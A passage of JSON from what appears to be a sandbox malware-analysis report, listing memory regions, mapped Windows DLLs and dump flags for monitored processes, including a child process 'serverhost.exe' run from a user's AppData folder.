"entry_point": 0, "filename": null, "id": "region_2380", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:52.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_2381", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:52.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1667071, "entry_point": 0, "filename": null, "id": "region_2382", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:01:52.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1712127, "entry_point": 0, "filename": null, "id": "region_2383", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:01:52.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 4132863, "entry_point": 0, "filename": null, "id": "region_2384", "name": "pagefile_0x00000000002f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3080192, "timestamp": "00:01:52.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7471104, "type": "region", "version": 1 }, "end_va": 7536639, "entry_point": 0, "filename": null, "id": "region_2385", "name": "private_0x0000000000720000", "norm_filename": null, "region_type": "private_memory", "start_va": 7471104, "timestamp": "00:01:52.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 23068671, "entry_point": 0, "filename": null, "id": "region_2386", "name": "pagefile_0x0000000000a00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10485760, "timestamp": "00:01:52.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 23068672, "type": "region", "version": 1 }, "end_va": 27209727, "entry_point": 0, "filename": null, "id": "region_2387", "name": "pagefile_0x0000000001600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 23068672, "timestamp": "00:01:52.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_2388", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:01:52.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 27262976, "type": "region", "version": 1 }, "end_va": 30207999, "entry_point": 27262976, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2389", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 27262976, "timestamp": "00:01:52.243", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1843199, "entry_point": 0, "filename": null, "id": "region_2390", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:52.246", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1946288128, "type": "region", "version": 1 }, "end_va": 1947983871, "entry_point": 1946288128, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_2391", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1946288128, "timestamp": "00:01:52.246", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 1900544, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_2392", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 1900544, "timestamp": "00:01:52.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1974271, "entry_point": 0, "filename": null, "id": "region_2393", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:01:52.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 7143423, "entry_point": 0, "filename": null, "id": "region_2394", "name": "private_0x00000000005d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6094848, "timestamp": "00:01:52.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_2395", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:52.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4571135, "entry_point": 4194304, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_2396", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:52.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4571135, "entry_point": 4339129, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_2397", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:52.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962475520, "type": "region", "version": 1 }, "end_va": 1962524671, "entry_point": 1962475520, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_2398", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962475520, "timestamp": "00:01:52.535", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1944715264, "type": "region", "version": 1 }, "end_va": 1944977407, "entry_point": 1944715264, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_2399", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1944715264, "timestamp": "00:01:52.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1376256, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 9109503, "entry_point": 0, "filename": null, "id": "region_2400", "name": "private_0x0000000000760000", "norm_filename": null, "region_type": "private_memory", "start_va": 7733248, "timestamp": "00:01:52.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 8646655, "entry_point": 0, "filename": null, "id": "region_2401", "name": "pagefile_0x0000000000760000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7733248, "timestamp": "00:01:52.661", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 9109503, "entry_point": 0, "filename": null, "id": "region_2402", "name": "private_0x0000000000870000", "norm_filename": null, "region_type": "private_memory", "start_va": 8847360, "timestamp": "00:01:52.661", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_2403", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:01:52.666", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1989607424, "type": "region", "version": 1 }, "end_va": 1990143999, "entry_point": 1989607424, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_2404", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1989607424, "timestamp": "00:01:52.667", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4198399, "entry_point": 0, "filename": null, "id": "region_2405", "name": "pagefile_0x0000000000400000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4194304, "timestamp": "00:01:52.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1944977408, "type": "region", "version": 1 }, "end_va": 1945980927, "entry_point": 1944977408, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_2406", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1944977408, "timestamp": "00:01:52.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1937309696, "type": "region", "version": 1 }, "end_va": 1937444863, "entry_point": 1937309696, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_2407", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1937309696, "timestamp": "00:01:52.944", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1967783936, "type": "region", "version": 1 }, "end_va": 1968066559, "entry_point": 1967783936, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_2408", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1967783936, "timestamp": "00:01:53.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4276223, "entry_point": 4259840, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", "id": "region_2409", "name": "cversions.1.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db", "region_type": "memory_mapped_file", "start_va": 4259840, "timestamp": "00:01:53.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 118784, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4444159, "entry_point": 4325376, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db", "id": "region_2410", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db", "region_type": "memory_mapped_file", "start_va": 4325376, "timestamp": "00:01:53.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4460543, "entry_point": 0, "filename": null, "id": "region_2411", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:01:53.164", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1963196416, "type": "region", "version": 1 }, "end_va": 1963241471, "entry_point": 1963196416, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_2412", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1963196416, "timestamp": "00:01:53.282", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 147456, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4669439, "entry_point": 0, "filename": null, "id": "region_2413", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:01:53.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1028096, "start_va": 1940127744, "type": "region", "version": 1 }, "end_va": 1941155839, "entry_point": 1940127744, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_2414", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 1940127744, "timestamp": "00:01:53.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_2415", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:01:53.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4296703, "entry_point": 0, "filename": null, "id": "region_2416", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:53.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 36864, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 4755455, "entry_point": 0, "filename": null, "id": "region_2417", "name": "private_0x0000000000480000", "norm_filename": null, "region_type": "private_memory", "start_va": 4718592, "timestamp": "00:01:53.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 147456, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 5980159, "entry_point": 0, "filename": null, "id": "region_2418", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:01:53.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 9109504, "type": "region", "version": 1 }, "end_va": 10158079, "entry_point": 0, "filename": null, "id": "region_2419", "name": "private_0x00000000008b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9109504, "timestamp": "00:01:53.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1897529344, "type": "region", "version": 1 }, "end_va": 1897840639, "entry_point": 1897529344, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_2420", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1897529344, "timestamp": "00:01:53.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1908998144, "type": "region", "version": 1 }, "end_va": 1929273343, "entry_point": 1908998144, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_2421", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1908998144, "timestamp": "00:01:53.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31653888, "type": "region", "version": 1 }, "end_va": 32702463, "entry_point": 0, "filename": null, "id": "region_2422", "name": "private_0x0000000001e30000", "norm_filename": null, "region_type": "private_memory", "start_va": 31653888, "timestamp": "00:01:53.384", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_2423", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:53.384", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 294912, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 7438335, "entry_point": 0, "filename": null, "id": "region_2424", "name": "private_0x00000000006d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7143424, "timestamp": "00:01:53.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1830486016, "type": "region", "version": 1 }, "end_va": 1850761215, "entry_point": 1830486016, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_2425", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1830486016, "timestamp": "00:01:53.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4595711, "entry_point": 0, "filename": null, "id": "region_2428", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:01:53.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 294912, "start_va": 30212096, "type": "region", "version": 1 }, "end_va": 30507007, "entry_point": 0, "filename": null, "id": "region_2432", "name": "private_0x0000000001cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30212096, "timestamp": "00:01:53.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 5906431, "entry_point": 0, "filename": null, "id": "region_2436", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:01:53.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 73728, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4726783, "entry_point": 0, "filename": null, "id": "region_2439", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:01:53.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4313087, "entry_point": 0, "filename": null, "id": "region_2440", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:53.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1962344448, "type": "region", "version": 1 }, "end_va": 1962455039, "entry_point": 1962344448, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_2441", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1962344448, "timestamp": "00:01:53.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 53248, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 6017023, "entry_point": 0, "filename": null, "id": "region_2442", "name": "private_0x00000000005b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5963776, "timestamp": "00:01:53.721", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "id": "proc_16", "image_name": "serverhost.exe", "monitor_reason": "child_process", "monitored_id": 16, "origin_monitor_id": 15, "ref_parent_process": { "ref_id": "proc_15", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2443", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:02:00.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_2444", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:02:00.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_2445", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:02:00.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 10354688, "type": "region", "version": 1 }, "end_va": 10465279, "entry_point": 10362256, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", "id": "region_2446", "name": "serverhost.exe", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "region_type": "memory_mapped_file", "start_va": 10354688, "timestamp": "00:02:00.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995374592, "type": "region", "version": 1 }, "end_va": 1996668927, "entry_point": 1995374592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2447", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995374592, "timestamp": "00:02:00.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997737983, "entry_point": 1997733888, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2448", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:02:00.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_2449", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:02:00.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", 